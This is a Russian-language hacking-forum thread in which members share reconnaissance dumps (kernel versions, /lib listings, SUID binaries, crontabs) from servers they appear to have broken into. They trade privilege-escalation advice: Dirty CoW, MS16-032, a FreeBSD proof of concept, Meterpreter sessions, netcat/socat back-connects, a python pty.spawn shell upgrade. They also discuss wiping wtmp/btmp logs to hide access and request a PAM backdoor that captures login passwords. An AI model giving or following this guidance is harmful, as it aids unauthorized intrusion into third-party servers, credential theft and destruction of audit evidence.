lrwxrwxrwx 1 root root 22 2013-04-29 14:39:24.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r-- 1 root root 13692 2011-01-08 09:59:32.000000000 +0300 libSegFault.so
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root 24800 2008-04-24 01:22:04.000000000 +0400 libacl.so.1.1.0
-rw-r--r-- 1 root root 9800 2011-01-08 09:59:32.000000000 +0300 libanl-2.7.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:39:24.000000000 +0400 libanl.so.1 -> libanl-2.7.so
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root 14744 2009-02-10 13:52:07.000000000 +0300 libattr.so.1.1.0
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
-rw-r--r-- 1 root root 38020 2008-10-13 07:33:35.000000000 +0400 libblkid.so.1.0
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 66276 2010-08-18 21:15:26.000000000 +0400 libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1294572 2011-01-08 09:59:32.000000000 +0300 libc-2.7.so
lrwxrwxrwx 1 root root 11 2013-04-29 14:39:24.000000000 +0400 libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 2004-04-14 02:10:45.000000000 +0400 libcap.so.1.10
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 19:26:50.000000000 +0400 libcap.so.2.11
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-16 01:18:10.000000000 +0400 libcfont.so.0.0.0
-rw-r--r-- 1 root root 185816 2011-01-08 09:59:32.000000000 +0300 libcidn-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:39:24.000000000 +0400 libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 07:33:34.000000000 +0400 libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-16 01:18:10.000000000 +0400 libconsole.so.0.0.0
-rw-r--r-- 1 root root 38296 2011-01-08 09:59:32.000000000 +0300 libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 2013-04-29 14:39:24.000000000 +0400 libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-16 01:18:10.000000000 +0400 libctutils.so.0.0.0
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libdb.so.2 -> libdb1-2.2.5.so
-rw-r--r-- 1 root root 55052 2006-02-15 01:06:32.000000000 +0300 libdb1-2.2.5.so
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libdb1.so.2 -> libdb1-2.2.5.so
-rw-r--r-- 1 root root 9680 2011-01-08 09:59:32.000000000 +0300 libdl-2.7.so
lrwxrwxrwx 1 root root 12 2013-04-29 14:39:24.000000000 +0400 libdl.so.2 -> libdl-2.7.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:38:23.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root 22912 2008-10-13 07:33:35.000000000 +0400 libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 167900 2008-10-13 07:33:35.000000000 +0400 libext2fs.so.2.4
-rw-r--r-- 1 root root 49676 2008-12-31 15:50:19.000000000 +0300 libgcc_s.so.1
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 28032 2009-01-20 18:07:11.000000000 +0300 libhistory.so.5.2
-rw-r--r-- 1 root root 5744 2008-09-01 15:01:21.000000000 +0400 libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
-rw-r--r-- 1 root root 149328 2011-01-08 09:59:32.000000000 +0300 libm-2.7.so
lrwxrwxrwx 1 root root 11 2013-04-29 14:39:24.000000000 +0400 libm.so.6 -> libm-2.7.so
-rw-r--r-- 1 root root 13692 2011-01-08 09:59:32.000000000 +0300 libmemusage.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7
-rw-r--r-- 1 root root 202188 2008-12-14 23:27:28.000000000 +0300 libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7
-rw-r--r-- 1 root root 249836 2008-12-14 23:27:29.000000000 +0300 libncursesw.so.5.7
-rw-r--r-- 1 root root 79608 2011-01-08 09:59:32.000000000 +0300 libnsl-2.7.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:39:24.000000000 +0400 libnsl.so.1 -> libnsl-2.7.so
-rw-r--r-- 1 root root 30436 2011-01-08 09:59:32.000000000 +0300 libnss_compat-2.7.so
lrwxrwxrwx 1 root root 20 2013-04-29 14:39:24.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.7.so
-rw-r--r-- 1 root root 17880 2011-01-08 09:59:33.000000000 +0300 libnss_dns-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:39:24.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.7.so
-rw-r--r-- 1 root root 38408 2011-01-08 09:59:32.000000000 +0300 libnss_files-2.7.so
lrwxrwxrwx 1 root root 19 2013-04-29 14:39:24.000000000 +0400 libnss_files.so.2 -> libnss_files-2.7.so
-rw-r--r-- 1 root root 17896 2011-01-08 09:59:32.000000000 +0300 libnss_hesiod-2.7.so
lrwxrwxrwx 1 root root 20 2013-04-29 14:39:24.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
-rw-r--r-- 1 root root 76292 2008-11-04 18:09:17.000000000 +0300 libnss_ldap-2.7.so
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libnss_ldap.so.2 -> libnss_ldap-2.7.so
-rw-r--r-- 1 root root 34348 2011-01-08 09:59:33.000000000 +0300 libnss_nis-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:39:24.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.7.so
-rw-r--r-- 1 root root 46600 2011-01-08 09:59:32.000000000 +0300 libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root 21 2013-04-29 14:39:24.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libpam.so.0 -> libpam.so.0.81.12
-rw-r--r-- 1 root root 40440 2009-03-18 03:03:06.000000000 +0300 libpam.so.0.81.12
lrwxrwxrwx 1 root root 21 2013-04-29 14:38:23.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.3
-rw-r--r-- 1 root root 8256 2009-03-18 03:03:06.000000000 +0300 libpam_misc.so.0.81.3
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
-rw-r--r-- 1 root root 9144 2009-03-18 03:03:06.000000000 +0300 libpamc.so.0.81.0
-rw-r--r-- 1 root root 5440 2011-01-08 09:59:32.000000000 +0300 libpcprofile.so
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root 33284 2008-06-25 10:27:20.000000000 +0400 libpopt.so.0.0.0
-rw-r--r-- 1 root root 56180 2009-01-12 00:49:28.000000000 +0300 libproc-3.2.7.so
-rwxr-xr-x 1 root root 112012 2011-01-08 09:59:36.000000000 +0300 libpthread-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:39:24.000000000 +0400 libpthread.so.0 -> libpthread-2.7.so
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 200548 2009-01-20 18:07:11.000000000 +0300 libreadline.so.5.2
-rw-r--r-- 1 root root 63312 2011-01-08 09:59:32.000000000 +0300 libresolv-2.7.so
lrwxrwxrwx 1 root root 16 2013-04-29 14:39:24.000000000 +0400 libresolv.so.2 -> libresolv-2.7.so
-rw-r--r-- 1 root root 30624 2011-01-08 09:59:32.000000000 +0300 librt-2.7.so
lrwxrwxrwx 1 root root 12 2013-04-29 14:39:24.000000000 +0400 librt.so.1 -> librt-2.7.so
-rw-r--r-- 1 root root 95964 2008-09-16 11:38:17.000000000 +0400 libselinux.so.1
-rw-r--r-- 1 root root 215260 2008-07-12 18:51:50.000000000 +0400 libsepol.so.1
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libslang.so.2 -> libslang.so.2.1.3
-rw-r--r-- 1 root root 683040 2008-03-17 21:50:56.000000000 +0300 libslang.so.2.1.3
lrwxrwxrwx 1 root root 12 2013-04-29 14:38:23.000000000 +0400 libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root 18636 2008-10-13 07:33:34.000000000 +0400 libss.so.2.0
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libsysfs.so.2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root 38584 2008-09-06 12:40:51.000000000 +0400 libsysfs.so.2.0.1
-rw-r--r-- 1 root root 26284 2011-01-08 09:59:32.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2013-04-29 14:39:24.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:38:23.000000000 +0400 libtic.so.5 -> libtic.so.5.7
-rw-r--r-- 1 root root 71736 2008-12-14 23:27:28.000000000 +0300 libtic.so.5.7
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libticw.so.5 -> libticw.so.5.7
-rw-r--r-- 1 root root 71736 2008-12-14 23:27:29.000000000 +0300 libticw.so.5.7
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 29264 2008-09-05 15:21:18.000000000 +0400 libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 9684 2011-01-08 09:59:32.000000000 +0300 libutil-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:39:24.000000000 +0400 libutil.so.1 -> libutil-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
-rw-r--r-- 1 root root 12912 2008-10-13 07:33:34.000000000 +0400 libuuid.so.1.2
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 31168 2008-07-26 03:45:03.000000000 +0400 libwrap.so.0.7.6
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libxtables.so.0 -> libxtables.so.0.0.0
-rw-r--r-- 1 root root 18380 2009-02-09 22:52:34.000000000 +0300 libxtables.so.0.0.0
drwxr-xr-x 2 root root 4096 2010-11-11 17:57:28.000000000 +0300 lsb
drwxr-xr-x 5 root root 4096 2016-01-21 14:15:29.181003302 +0400 modules
drwxr-xr-x 2 root root 4096 2010-11-11 17:58:14.000000000 +0300 security
drwxr-xr-x 15 root root 4096 2010-11-11 17:57:27.000000000 +0300 terminfo
drwxr-xr-x 3 root root 4096 2013-04-29 14:38:26.000000000 +0400 udev
drwxr-xr-x 2 root root 4096 2010-11-11 17:57:51.000000000 +0300 xtables

Spoiler: mount

Code:
$ mount 2>&1
/dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime,mode=755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)

Spoiler: df -h

Code:
$ df -h 2>&1
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 50G 36G 15G 71% /
tmpfs 1.0G 0 1.0G 0% /lib/init/rw
tmpfs 1.0G 0 1.0G 0% /dev/shm

Spoiler: cat /etc/issue

Code:
$ cat /etc/issue 2>&1
Debian GNU/Linux 5.0 \n \l

Spoiler: cat /etc/crontab

Code:
$ cat /etc/crontab 2>&1
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
12 * * * * root cd / && run-parts --report /etc/cron.hourly
53 4 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
46 0 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
55 5 30 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Spoiler: cat /proc/version

Code:
$ cat /proc/version 2>&1
Linux version 2.6.32-37-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Wed Feb 11 10:00:27 CET 2015

Spoiler: cat /proc/sys/vm/mmap_min_addr

Code:
$ cat /proc/sys/vm/mmap_min_addr 2>&1
4096

Spoiler: ls -la /usr/bin/staprun"

Code:
$ ls -la /usr/bin/staprun 2>&1
ls: cannot access /usr/bin/staprun: No such file or directory

Проверяли dirtyc0w?

zifus

13.11.2016, 23:23

YaBtr said:
↑ (https://antichat.live/posts/4011534/)
Проверяли dirtyc0w?

Да, не подходит

Rastamanka

17.12.2016, 23:27

.SpoilerTarget" type="button">Spoiler: uname -a
Linux easymoneyeasylife.org 2.6.32-642.11.1.el6.x86_64 #1 SMP Fri Nov 18 19:25:05 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

.SpoilerTarget" type="button">Spoiler: ls -la --full-time /lib
total 48

dr-xr-xr-x. 10 root root 4096 2016-12-17 15:45:47.044000005 +0200 .

dr-xr-xr-x. 22 root root 4096 2016-12-17 15:50:37.719000033 +0200 ..

drwxr-xr-x. 3 root root 4096 2016-12-17 15:45:47.044000005 +0200 alsa

drwxr-xr-x. 3 root root 4096 2016-12-17 15:44:55.387000010 +0200 crda

drwxr-xr-x. 46 root root 12288 2016-12-17 15:46:04.550000005 +0200 firmware

drwxr-xr-x. 6 root root 4096 2016-12-17 15:44:23.373000005 +0200 kbd

dr-xr-xr-x. 3 root root 4096 2016-12-17 15:44:36.126000005 +0200 modules

drwxr-xr-x. 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security

drwxr-xr-x. 6 root root 4096 2016-12-17 15:42:48.750000003 +0200 terminfo

drwxr-xr-x. 5 root root 4096 2016-12-17 16:17:53.602000064 +0200 udev

.SpoilerTarget" type="button">Spoiler: mount
/dev/vda3 on / type ext4 (rw)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw)

/dev/vda1 on /boot type ext4 (rw)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

.SpoilerTarget" type="button">Spoiler: uname -a
Filesystem Size Used Avail Use% Mounted on

/dev/vda3 9.3G 1.4G 7.4G 16% /

tmpfs 371M 0 371M 0% /dev/shm

/dev/vda1 240M 34M 194M 15% /boot

.SpoilerTarget" type="button">Spoiler: cat /etc/issue
CentOS release 6.8 (Final)

Kernel \r on an \m

.SpoilerTarget" type="button">Spoiler: cat /etc/crontab
SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# | .------------- hour (0 - 23)

# | | .---------- day of month (1 - 31)

# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# | | | | |

# * * * * * user-name command to be executed

.SpoilerTarget" type="button">Spoiler: cat /proc/version
Linux version 2.6.32-642.11.1.el6.x86_64 (mockbuild@c1bm.rdu (mailto:mockbuild@c1bm.rdu)2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Fri Nov 18 19:25:05 UTC 2016

.SpoilerTarget" type="button">Spoiler: cat /proc/sys/vm/mmap_min_addr
4096

.SpoilerTarget" type="button">Spoiler: ls -la /usr/bin/staprun
---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun

.SpoilerTarget" type="button">Spoiler: find / -type f -perm -u+s -exec ls -la {} \;
-rwsr-xr-x. 1 root root 34904 May 11 2016 /bin/su

-rwsr-xr-x. 1 root root 36488 May 10 2016 /bin/ping6

-rwsr-xr-x. 1 root root 53472 Nov 18 17:38 /bin/umount

-rwsr-xr-x. 1 root root 77336 Nov 18 17:38 /bin/mount

-rwsr-xr-x. 1 root root 38264 May 10 2016 /bin/ping

-rwsr-xr-x. 1 root root 70480 May 11 2016 /usr/bin/chage

-rws--x--x. 1 root root 20184 Nov 18 17:38 /usr/bin/chfn

---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun

-rwsr-xr-x. 1 root root 51784 Aug 23 21:36 /usr/bin/crontab

-rws--x--x. 1 root root 20056 Nov 18 17:38 /usr/bin/chsh

-rwsr-xr-x. 1 root root 54496 Feb 19 2015 /usr/bin/at

-rwsr-xr-x. 1 root root 75640 May 11 2016 /usr/bin/gpasswd

-rwsr-xr-x. 1 root root 22544 Mar 17 2015 /usr/bin/pkexec

-rwsr-xr-x. 1 root root 30768 Nov 23 2015 /usr/bin/passwd

-rwsr-xr-x. 1 root root 40240 May 11 2016 /usr/bin/newgrp

---s--x--x. 1 root root 123832 Dec 7 02:36 /usr/bin/sudo

-rwsr-xr-x. 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1

-rwsr-xr-x. 1 root root 257824 May 12 2016 /usr/libexec/openssh/ssh-keysign

-rwsr-xr-x. 1 abrt abrt 10296 May 11 2016 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache

-rws--x--x. 1 root root 14280 May 10 2016 /usr/libexec/pt_chown

-rws--x--x 1 root root 42288 Aug 22 2010 /usr/sbin/userhelper

-r-s--x--- 1 root apache 13984 Nov 19 01:49 /usr/sbin/suexec

-rwsr-xr-x. 1 root root 9000 Jul 12 19:40 /usr/sbin/usernetctl

-rwsr-x--- 1 root dbus 50552 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper

-rwsr-xr-x. 1 root root 10272 May 11 2016 /sbin/pam_timestamp_check

-rwsr-xr-x. 1 root root 34840 May 11 2016 /sbin/unix_chkpwd

Пробовала enlightenment. Результатов не дало(

Хотя как я поняла там нету компилятора(((

artur1111

01.02.2017, 20:43

Скажите а с таким пользователем 33 ( www-data ) Group: 33 ( www-data ) можно запускать баш команды? Для выполнения эксплоита!

Gorev

01.02.2017, 20:47

artur1111 said:
↑ (https://antichat.live/posts/4043341/)
Скажите а с таким пользователем 33 ( www-data ) Group: 33 ( www-data ) можно запускать баш команды? Для выполнения эксплоита!

ты сначала проверь наличие gcc

artur1111

01.02.2017, 21:15

[QUOTE="Gorev"]
Gorev said:
↑ (https://antichat.live/posts/4043342/)
ты сначала проверь наличие gcc

Gorev

01.02.2017, 21:41

ну так сначала бэк коннект замути, так что бы консоль была, а дальше дерзай, из всо у меня не всегда получалось , пробовал сторонний перл скрипт на открытие порта и коннекта к своей машине, как консоль откроешьЮ пробуй уже все варианты, про безопасность не забывай

roman921

02.02.2017, 14:41

Ребята, подскажите какие эксплойты можно попробовать на windows server 2003 sp2 r2 (точно не знаю есть ли там r2), винда 32 битная.

На 7 нашел ms16-032 powershell скрипт, на 7 64 битной выдал права. Но проблема в том, что 2003 машина не имеет еще powershell, можно ли без прав админа как-то портабельно поставить ее туда или только переписывать код на с++, c# ?

Кстати может кто посоветовать подборку эксплойтов для повышения привелегий в 2003 сервере 32 битном.

artur1111

02.02.2017, 20:06

roman921 said:
↑ (https://antichat.live/posts/4043603/)
Ребята, подскажите какие эксплойты можно попробовать на windows server 2003 sp2 r2 (точно не знаю есть ли там r2), винда 32 битная.
На 7 нашел ms16-032 powershell скрипт, на 7 64 битной выдал права. Но проблема в том, что 2003 машина не имеет еще powershell, можно ли без прав админа как-то портабельно поставить ее туда или только переписывать код на с++, c# ?
Кстати может кто посоветовать подборку эксплойтов для повышения привелегий в 2003 сервере 32 битном.

Реализация на C#

https://www.exploit-db.com/exploits/39809/

Alexsize

09.03.2017, 22:29

[SIZE="5"][B]OpenSSH 6.8

altblitz

10.03.2017, 02:51

[QUOTE="Alexsize"]
Alexsize said:
↑ (https://antichat.live/posts/4058163/)
[SIZE="5"][B]OpenSSH 6.8

dw0rd007

13.03.2017, 00:56

Парни приветсвую. Есть фря 10.2, 2015 года.

Есть ли сплоит под нее? Есть может кто сможет помочь с POC довести до боевого сплоита?

https://cturt.github.io/sendmsg.html

И еще, подскажите какойнить рутки\PAM бекдор(для linux уже) что бы собрать пароли которые вводятся при входе, да и принимало "мастер" пасс

ACat

14.03.2017, 15:11

Парни, подскажите по ситуации:

есть сработавший Dirty CoW.

Подключен через netcat. Соответственно юзера сменить не могу. через su или login.

expect не установлен.

Шо робити?)

dw0rd007

14.03.2017, 15:44

ACat said:
↑ (https://antichat.live/posts/4060239/)
Парни, подскажите по ситуации:
есть сработавший Dirty CoW.
Подключен через netcat. Соответственно юзера сменить не могу. через su или login.
expect не установлен.
Шо робити?)

Используй бекконект с tty (к примеру python-pty-shells-master ,тогда сможешь пользователя сменить) Либо подключайся по ssh. не забудь почистить

/var/log/wtmp /var/log/btmp

ACat

15.03.2017, 23:56

Так, народ, требую вашей помощи ибо всего навалилось и мозг опух... Вопросов будет несколько, они покажутся вам нубскими, но мне по*** лучше показаться тупым, но узнать, чем не узнать.

1 - бэк-коннект. Для этого нужен выделенный IP адрес, верно? Если его нету, но используется VPN бэк-коннект возможен?

2 - бинд-порт. Вроде бы понятно. но как забиндить порт для TTY сессии? верней заспаунить TTY сессию, которая подождет пока я к ней подключюсь.

3 - бинарный шелл. если есть машина, где не компилится ничего, и вообще админ - уебок и не работает половина функций, то вроде как, ко слухам, можно запусть ./bind_port бинарник и он забиндит порт, т.к. ип у меня не выделенный, предварительно скомпилировав этот самый бинарник либо на подобной конфигурации либо используя msfvenom. ЭТО ТАК?!

4 - чем потом к этому порту подключатся? я серьезно блять чем?? netcat не подходит вроде?

{iddqd} said:
↑ (https://antichat.live/posts/4060995/)
1) можно бек коннектица на ломаный дедик с выделенным ip
или vps сервер в Сомали

это и так понятно.

есть конкретные условия. И да, ломаный дедик в сомали не поможет с TTY

Хуй с ним, разобрался сам.

1 - нет

2 - нихуя не разобрался

3 и 4

вот гайд http://netsec.ws/?p=331

так, а теперь новые вопросы в студию, для вас от меня:

Meterpreter session 3 opened (*****:45835 -> *****:3443) at 2017-03-15 16:07:22 -0600

meterpreter > shell

su firefart

su: must be run from a terminal

sudo su

sudo: no tty present and no askpass program specified

на сколько я понял адмие ебнулся и отключил TTY? это вообще блять нормально?!

вапрiс: как перелогинится из www-data без прав в firefart с правави root?

p.s. сори за емоции, реально трудный день...

{iddqd}

15.03.2017, 23:59

1) можно бек коннектица на ломаный дедик с выделенным ip

или vps сервер в Сомали

ACat

16.03.2017, 03:39

firefart@rz ~ # id

uid=0(firefart) gid=0(root) groups=0(root)

помог ssh

но вопрос остался без ответа

VY_CMa

16.03.2017, 11:30

1 - бэк-коннект. Для этого нужен выделенный IP адрес, верно? Если его нету, но используется VPNбэк-коннект возможен?

Бэк возможен при прямом доступе к реверс-серверу напрямую. VPN роли не играет. Возможно использование туннелей, популярный сервис: https://ngrok.com/

2 - бинд-порт. Вроде бы понятно. но как забиндить порт для TTY сессии? верней заспаунить TTY сессию, которая подождет пока я к ней подключюсь.

Биндить порт нужно для какого-нибудь листенера. Обычно используются популярные шеллкоды, в которых идет проброс в cmd и прочую нечисть. Удобные инструменты: netcat, socat.

3 - бинарный шелл. если есть машина, где не компилится ничего, и вообще админ - уебок и не работает половина функций, то вроде как, ко слухам, можно запусть ./bind_port бинарник и он забиндит порт, т.к. ип у меня не выделенный, предварительно скомпилировав этот самый бинарник либо на подобной конфигурации либо используя msfvenom. ЭТО ТАК?!

бинарный шелл - это что-то смешное, так не говорят. Поднять можно что угодно.

4 - чем потом к этому порту подключатся? я серьезно блять чем?? netcat не подходит вроде?

Какой листенер, таким клиентом и подключаться. Забиндил на vnc - подключайся vnc клиентом.

на сколько я понял адмие ебнулся и отключил TTY? это вообще блять нормально?!

Там ничего не отключили.

spawn через python:

Code:
python -c 'import pty; pty.spawn("/bin/sh")'

ACat

16.03.2017, 19:04

Спасибо!

VY_CMa said:
↑ (https://antichat.live/posts/4061190/)
Там ничего не отключили.
spawn через python:

Code:
python -c 'import pty; pty.spawn("/bin/sh")'

Сейчас нет возможности, но в ближайшем времени доберусь до сервера и попробую, как Вы посоветовали. Отпишусь в этом посте.

Фак май моск, сработало!!!

Вы красава, Вам плюсик :3

.:[melkiy]:.

10.04.2017, 18:11

Парни, подскажите что можно попробовать.

uname -a

Code:
Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux

ls -la /boot

Code:
drwxr-xr-x 2 root root 4096 Jan 9 2010 .
drwxr-xr-x 20 root root 4096 Aug 7 2016 ..
-rw-r--r-- 1 root root 103204 Sep 28 2007 memtest86+.bin

ls -la --full-time /lib

Code:
drwxr-xr-x 13 root root 4096 2012-12-17 17:33:14.000000000 +0100 .
drwxr-xr-x 20 root root 4096 2016-08-07 20:50:02.414264805 +0200 ..
lrwxrwxrwx 1 root root 21 2010-03-02 18:37:34.000000000 +0100 cpp -> /etc/
alternatives/cpp
drwxr-xr-x 2 root root 4096 2011-08-22 15:45:21.000000000 +0200 dhcp3-client

drwxr-xr-x 2 root root 4096 2009-04-14 23:44:58.000000000 +0200 firmware
drwxr-xr-x 2 root root 4096 2009-08-18 02:49:39.000000000 +0200 i486-linux-g
nu
drwxr-xr-x 2 root root 4096 2016-05-29 18:40:22.466740561 +0200 init
drwxr-xr-x 2 root root 4096 2010-01-09 18:03:47.000000000 +0100 iptables
-rwxr-xr-x 1 root root 64612 2010-01-20 10:21:10.000000000 +0100 klibc-B9LS-G
jx2D7BYcbQig0RlgHKO9Y.so
-rwxr-xr-x 1 root root 109152 2012-12-15 20:01:15.000000000 +0100 ld-2.7.so
lrwxrwxrwx 1 root root 9 2012-12-17 17:33:13.000000000 +0100 ld-linux.so.
2 -> ld-2.7.so
-rw-r--r-- 1 root root 5440 2012-12-15 20:01:15.000000000 +0100 libBrokenLoc
ale-2.7.so
lrwxrwxrwx 1 root root 22 2012-12-17 17:33:13.000000000 +0100 libBrokenLoc
ale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r-- 1 root root 13696 2012-12-15 20:01:15.000000000 +0100 libSegFault.
so
lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libacl.so.1
-> libacl.so.1.1.0
-rw-r--r-- 1 root root 22544 2007-11-14 11:59:18.000000000 +0100 libacl.so.1.
1.0
-rw-r--r-- 1 root root 9804 2012-12-15 20:01:15.000000000 +0100 libanl-2.7.s
o
lrwxrwxrwx 1 root root 13 2012-12-17 17:33:13.000000000 +0100 libanl.so.1
-> libanl-2.7.so
lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libatm.so.1
-> libatm.so.1.0.0
-rw-r--r-- 1 root root 32224 2007-08-14 22:27:59.000000000 +0200 libatm.so.1.
0.0
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libattr.so.1
-> libattr.so.1.1.0
-rw-r--r-- 1 root root 13592 2007-10-31 23:45:11.000000000 +0100 libattr.so.1
.1.0
lrwxrwxrwx 1 root root 15 2010-03-02 18:37:33.000000000 +0100 libblkid.so.
1 -> libblkid.so.1.0
-rw-r--r-- 1 root root 36964 2008-03-27 18:25:48.000000000 +0100 libblkid.so.
1.0
lrwxrwxrwx 1 root root 15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1
-> libbz2.so.1.0.4
